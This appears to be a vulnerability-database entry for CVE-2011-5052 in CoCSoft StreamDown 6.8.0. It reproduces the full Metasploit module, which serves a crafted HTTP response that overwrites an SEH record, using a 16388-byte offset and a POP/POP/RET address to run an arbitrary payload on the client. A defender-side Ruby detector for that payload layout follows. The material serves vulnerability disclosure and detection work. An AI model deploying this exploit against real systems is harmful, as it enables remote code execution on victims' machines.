CoCSoft StreamDown 6.8.0 Buffer Overflow

Metasploit module: MSF:EXPLOIT-WINDOWS-MISC-STREAM_DOWN_BOF-
Published: 2011-12-30 16:16:29
Author: Fady Mohamed Osman <[email protected]>
Source: www.rapid7.com

CVSS2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
  Attack Vector: NETWORK
  Attack Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL

EPSS: 0.065 (percentile 93.9%)

StreamDown 6.8.0 contains an SEH-based buffer overflow that is triggered when the client processes the server's response packet; the overflow overwrites a structured exception handler record.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
      'Description'    => %q{
        Stream Down 6.8.0 seh based buffer overflow triggered when processing
        the server response packet. During the overflow a structured exception
        handler is overwritten.
      },
      'Author'         => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
      'References'     =>
        [
          ['CVE', '2011-5052'],
          ['OSVDB', '78043'],
          ['BID', '51190'],
          ['URL', 'http://www.dark-masters.tk/'],
          ['URL', 'http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343'],
          ['EDB', '18283']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\xff\x0a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'StreamDown 6.8.0',
            {
              'Offset' => 16388,
              'Ret'    => 0x10019448 # POP/POP/RET in DownloadMng.dll
            }
          ],
        ],
      'DisclosureDate' => '2011-12-27', # as an actual security bug
      'DefaultTarget'  => 0,
      'License'       => MSF_LICENSE
    ))
  end

  def on_request_uri(cli,request)
    vprint_status("Requested: #{request.uri}")

    # No point to continue if the client isn't what we interested in
    ua = request.headers['User-Agent']
    if ua !~ /CoCSoft Stream Download/i
      print_error("Target not supported: #{ua}")
      send_not_found(cli)
      return
    end

    nseh = "\xeb\x06" + rand_text_alpha(2)
    seh = [target.ret].pack('V')
    offset_to_nseh = target['Offset']
    nops = make_nops(10)
    sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
    cli.put(sploit)
    close_client(cli)
  end
end
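As an added defender-side example, not part of the module above or of the advisory: a Ruby check that flags an HTTP response body laid out the way this module builds its payload (filler up to the 16388-byte nSEH offset, a 2-byte short jump in the nSEH slot, then the DownloadMng.dll POP/POP/RET address 0x10019448 as the SEH handler). The sample bodies are constructed, not captured traffic, and the function name is my own.

```ruby
# Added detection example (not from the Metasploit module or the advisory).
# Flags a response body matching the layout the StreamDown module sends:
# 16388 bytes of filler, a short jump in the nSEH slot, then the
# DownloadMng.dll POP/POP/RET address 0x10019448 as the SEH handler.
NSEH_OFFSET = 16388
PPR_ADDR    = 0x10019448
SHORT_JMP   = "\xeb\x06".b  # "jmp $+8": hops over the SEH record

# Returns an array of human-readable findings; empty means nothing matched.
def streamdown_overflow_indicators(body)
  body = body.b
  findings = []
  # Too short to reach the SEH record this target overwrites
  return findings if body.bytesize < NSEH_OFFSET + 8

  findings << "body length #{body.bytesize} exceeds StreamDown nSEH offset #{NSEH_OFFSET}"

  nseh = body[NSEH_OFFSET, 2]                        # first 2 bytes of nSEH slot
  seh  = body[NSEH_OFFSET + 4, 4].unpack1('V')       # handler address, little-endian
  findings << 'short jump (eb 06) in nSEH slot' if nseh == SHORT_JMP
  if seh == PPR_ADDR
    findings << format('SEH handler 0x%08x is the known DownloadMng.dll POP/POP/RET', seh)
  end
  # rand_text_alpha-style padding is a long run of letters only
  filler = body[0, NSEH_OFFSET]
  findings << 'filler before nSEH is entirely alphabetic' if filler.match?(/\A[A-Za-z]+\z/)
  findings
end

# Constructed samples (not captured traffic).
SAMPLE_EXPLOIT = ('A' * NSEH_OFFSET) + SHORT_JMP + 'XY' +
                 [PPR_ADDR].pack('V') + ("\x90".b * 10) + ('C' * 300)
SAMPLE_BENIGN  = "HTTP/1.1 200 OK\r\nContent-Type: video/mp4\r\n\r\n" + ("\x00".b * 100)

if __FILE__ == $PROGRAM_NAME
  puts streamdown_overflow_indicators(SAMPLE_EXPLOIT)
  puts streamdown_overflow_indicators(SAMPLE_BENIGN).inspect
end
```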

